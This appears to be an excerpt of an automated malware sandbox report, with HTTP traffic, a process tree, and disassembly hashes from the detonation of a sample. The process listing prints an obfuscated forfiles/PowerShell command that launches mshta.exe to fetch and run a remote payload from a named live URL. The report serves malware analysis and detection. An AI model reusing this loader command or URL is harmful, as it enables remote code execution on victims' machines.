                                                                                                                                                                                                      2024-10-27 06:35:25 UTC458OUTGET /wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7 HTTP/1.1
                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                      Referer: https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Accept-Language: en-CH
                                                                                                                                                                                                      UA-CPU: AMD64
                                                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                      Host: gurt.duna.ua
                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                      2024-10-27 06:35:26 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                      Date: Sun, 27 Oct 2024 06:35:26 GMT
                                                                                                                                                                                                      Content-Type: application/javascript
                                                                                                                                                                                                      Content-Length: 1969
                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                      Last-Modified: Fri, 16 Jul 2021 08:06:48 GMT
                                                                                                                                                                                                      ETag: "60f13e18-7b1"
                                                                                                                                                                                                      x-ray: wnp447:0.000/wn447:0.000/
                                                                                                                                                                                                      Expires: Sun, 03 Nov 2024 06:35:26 GMT
                                                                                                                                                                                                      Cache-Control: max-age=604800
                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                      2024-10-27 06:35:26 UTC1969INData Raw: 2f 2a 20 67 6c 6f 62 61 6c 20 6a 51 75 65 72 79 2c 20 61 6a 61 78 75 72 6c 2c 20 77 64 72 5f 64 61 74 61 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 20 7b 0a 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 20 22 2e 61 77 64 72 5f 63 68 61 6e 67 65 5f 70 72 6f 64 75 63 74 22 2c 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 70 72 6f 64 75 63 74 5f 69 64 20 3d 20 24 28 74 68 69 73 29 2e 61 74 74 72 28 27 64 61 74 61 2d 70 69 64 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 75 6c 65 5f 75 6e 69 71 75 65 5f 69 64 20 3d 20 24 28 74 68 69 73 29
                                                                                                                                                                                                      Data Ascii: /* global jQuery, ajaxurl, wdr_data */(function ($) { $(document).ready(function () { $(document).on("click", ".awdr_change_product", function() { var product_id = $(this).attr('data-pid'); var rule_unique_id = $(this)


                                                                                                                                                                                                      Statistics

                                                                                                                                                                                                      CPU Usage

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      Memory Usage

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                      Behavior

                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                      System Behavior

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                      Start time:02:35:01
                                                                                                                                                                                                      Start date:27/10/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\forfiles.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:"C:\Windows\System32\forfiles.exe" /p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Imagebase:0x7ff795b40000
                                                                                                                                                                                                      File size:52'224 bytes
                                                                                                                                                                                                      MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                      Start time:02:35:01
                                                                                                                                                                                                      Start date:27/10/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                      Start time:02:35:01
                                                                                                                                                                                                      Start date:27/10/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:. \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Imagebase:0x7ff7be880000
                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                      Start time:02:35:03
                                                                                                                                                                                                      Start date:27/10/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:"C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
                                                                                                                                                                                                      Imagebase:0x7ff65bb50000
                                                                                                                                                                                                      File size:14'848 bytes
                                                                                                                                                                                                      MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      General

                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                      Start time:02:35:22
                                                                                                                                                                                                      Start date:27/10/2024
                                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                      Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                      Disassembly

                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                        Function 00000134733A0FB1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.3292329320.00000134733A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000134733A0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_134733a0000_mshta.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                        • Instruction ID: e7ca4f8b71a35a4f7f9007dda284a8d0cc11be2b1770c18584df1dd9b9ce607c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F90021449540656D43411A10C4629C60406388254FD846805426A4144D54D13961193
                                                                                                                                                                                                        Function 00000134733A0FA9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.3292329320.00000134733A0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000134733A0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_134733a0000_mshta.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                        • Instruction ID: e7ca4f8b71a35a4f7f9007dda284a8d0cc11be2b1770c18584df1dd9b9ce607c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2F90021449540656D43411A10C4629C60406388254FD846805426A4144D54D13961193
                                                                                                                                                                                                        Function 00000134705B0FC1 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.3291254683.00000134705B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000134705B0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_134705b0000_mshta.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                        • Instruction ID: 254752be646fb1a19d817f4676f810cb3c07ad404b176396f6ef2b9e0739114d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E90025859640A96D46451910C466AC60406388290FD455804416D0144D54D63971252
                                                                                                                                                                                                        Function 00000134705B0FB9 Relevance: .0, Instructions: 5COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000004.00000002.3291254683.00000134705B0000.00000010.00000800.00020000.00000000.sdmp, Offset: 00000134705B0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_134705b0000_mshta.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                        • Instruction ID: 254752be646fb1a19d817f4676f810cb3c07ad404b176396f6ef2b9e0739114d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E90025859640A96D46451910C466AC60406388290FD455804416D0144D54D63971252